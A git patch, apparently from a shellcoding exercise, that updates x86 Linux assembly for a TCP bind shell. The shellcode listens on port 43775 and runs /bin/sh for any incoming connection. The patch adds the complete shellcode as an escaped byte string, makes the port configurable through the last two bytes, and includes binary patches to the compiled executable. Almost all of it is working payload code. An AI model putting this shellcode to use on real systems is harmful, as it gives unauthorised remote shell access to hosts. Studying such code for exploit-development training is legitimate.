From 6cfe507410912d06aa8f7ee9084dc5c4f81fcbc9 Mon Sep 17 00:00:00 2001
From: arno01 <andrey.arapov@gmail.com>
Date: Sat, 9 Mar 2013 11:41:17 +0100
Subject: [PATCH] minor updates

---
 exam1/shell_bind_tcp.nasm         |   2 +-
 exam1/shell_bind_tcp_smaller      | Bin 626 -> 696 bytes
 exam1/shell_bind_tcp_smaller.nasm |  19 +++++++++++++++----
 exam1/shell_bind_tcp_smaller.o    | Bin 560 -> 624 bytes
 4 files changed, 16 insertions(+), 5 deletions(-)

diff --git a/exam1/shell_bind_tcp.nasm b/exam1/shell_bind_tcp.nasm
index 1dae0e2..b078c38 100644
--- a/exam1/shell_bind_tcp.nasm
+++ b/exam1/shell_bind_tcp.nasm
@@ -135,7 +135,7 @@ port_in_esp:
 	push edx		; ANY HOST (0.0.0.0)}			||		struct in_addr sin_addr (unsigned long s_addr) };
 	;push DWORD 0x0100007f	; For 127.0.0.1 HOST
 	;push WORD 0xffaa	; PORT 43775 (reverse),			||	 	unsigned short sin_port,
-	push WORD [edi]		; PORT is specified in the bottom of the code / shellcode. Last two bytes in HEX.
+	push WORD [edi]		; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
 
 	push WORD bx		; 2 - AF_INET				|| struct sockaddr { short sin_family,
 	mov ecx, esp		; Save PTR to sockaddr struct in ECX
diff --git a/exam1/shell_bind_tcp_smaller b/exam1/shell_bind_tcp_smaller
index c02515d22f5150240a7dde486276cb5ec4c0e467..aae886e98a378e0d806b208982e0b339e48f1f0e 100755
GIT binary patch
delta 262
zcmeywvV(Pk0^^5?ips2K7#JANO!U;^eH{>=l@{S_cqu6Dzxl*ESN0dH|NsBL>i@*U
zo|8El#Tj!ZD>5oGo|){*sLs2Ck%3_WP$LTvvrVpKlxB@!Vqi#^Jd@Eqv9y7O11Jmx
zj0~DUaw!tu7|1`0#CHVp6QFznpn4A=|I7r4egTG$|3lFD(IEb0MJ5gBg8ZVA_{_Zc
z)Zzk$l+psD_?-Ow0*2(ooSgXd)RK6RG(&uGNg{}fPbw~ku~SnLOA;C4Q}a?70CL_&
AZU6uP

delta 188
zcmdnN`iW(N0^^g3ips2q85kH2PxRE{&Pt1LHoO#+mSJEyvB7oX8PCZQj3SK5lXV%D
z84phmWK`E(!^ptU094L`gav?XP9SCmVi?e2VqkEayp+-1ad86+2Sk*SK^@3Qfbs<x
r7#Z|{{KFF<@&XJW|68H)9fABKlYN;qI8#asjN)_h^9v@=U{U}8te7RO

diff --git a/exam1/shell_bind_tcp_smaller.nasm b/exam1/shell_bind_tcp_smaller.nasm
index 14b28a1..ada6618 100644
--- a/exam1/shell_bind_tcp_smaller.nasm
+++ b/exam1/shell_bind_tcp_smaller.nasm
@@ -3,11 +3,13 @@
 ; 2013 March
 ;
 ; DESC:
-; Binds to a port 12345
+; Binds to a port 43775
 ; Execs Shell on incoming connection
 ;
-; TODO:
-; 1. Port number should be easily configurable;
+;
+; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
+;
+; Port is the last two bytes of the shellcode. In hex \xaa\xff  (0xaaff = 43775)
 ;
 ;
 
@@ -27,12 +29,17 @@ _start:
 	int 0x80
 	mov esi, eax		; save socket fd in ESI for later
 
+
+	jmp short call_get_port
+port_in_esp:
+	pop edi			; getting port address from ESP
+
 	push BYTE 102
 	pop eax			; socketcall
 	inc ebx			; 2 = SYS_BIND bind()
 	xor edx, edx
 	push edx		; 0 = ANY HOST (0.0.0.0)}		||		struct in_addr sin_addr (unsigned long s_addr) };
-	push WORD 0x3930	; PORT 12345 (reverse),			||	 	unsigned short sin_port,
+	push WORD [edi]		; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
 	push WORD bx		; 2 = AF_INET				|| struct sockaddr { short sin_family,
 	mov ecx, esp		; Save PTR to sockaddr struct in ECX
 	push BYTE 16		; 	socklen_t addrlen);
@@ -85,3 +92,7 @@ dup2_loop:
 	mov al, 11		; execve
 	int 0x80
 
+call_get_port:
+	call port_in_esp
+	db 0xaa, 0xff		; BYTE (43775 in straight hex)
+
diff --git a/exam1/shell_bind_tcp_smaller.o b/exam1/shell_bind_tcp_smaller.o
index d781a95b3b7e4aa57f45f81cd663b3081ad4b495..a2f6941a40b07e90b6c421b0ea45ccb5b5e2f89a 100644
GIT binary patch
delta 169
zcmdnM@_}VS4P(y4T7S&~1_lNeAZCNo0zg_4h?#*H1{9bW7(6C^)#H5~5TBJ6;cR#*
zDDA)bWIaY#_7|)F|Np=0|Ku9R3`J3xdIm-Y10dTKiEjmDr%ry#Xs=U{UsMvGnHQg0
eT)>c0T3{5Plb>I}kery46Q7=15)YDw>jMA?HYWD~

delta 105
zcmeysvVmnn4P)}eT7S&|1_lNeBrE`AO9C-75W@iz1B2eguX@~BX%Wtbmx9tV3@j%b
gFuHQW6-=&S%wTk$%*tfXlTun>6rYoyUjUQ@0D*53Q~&?~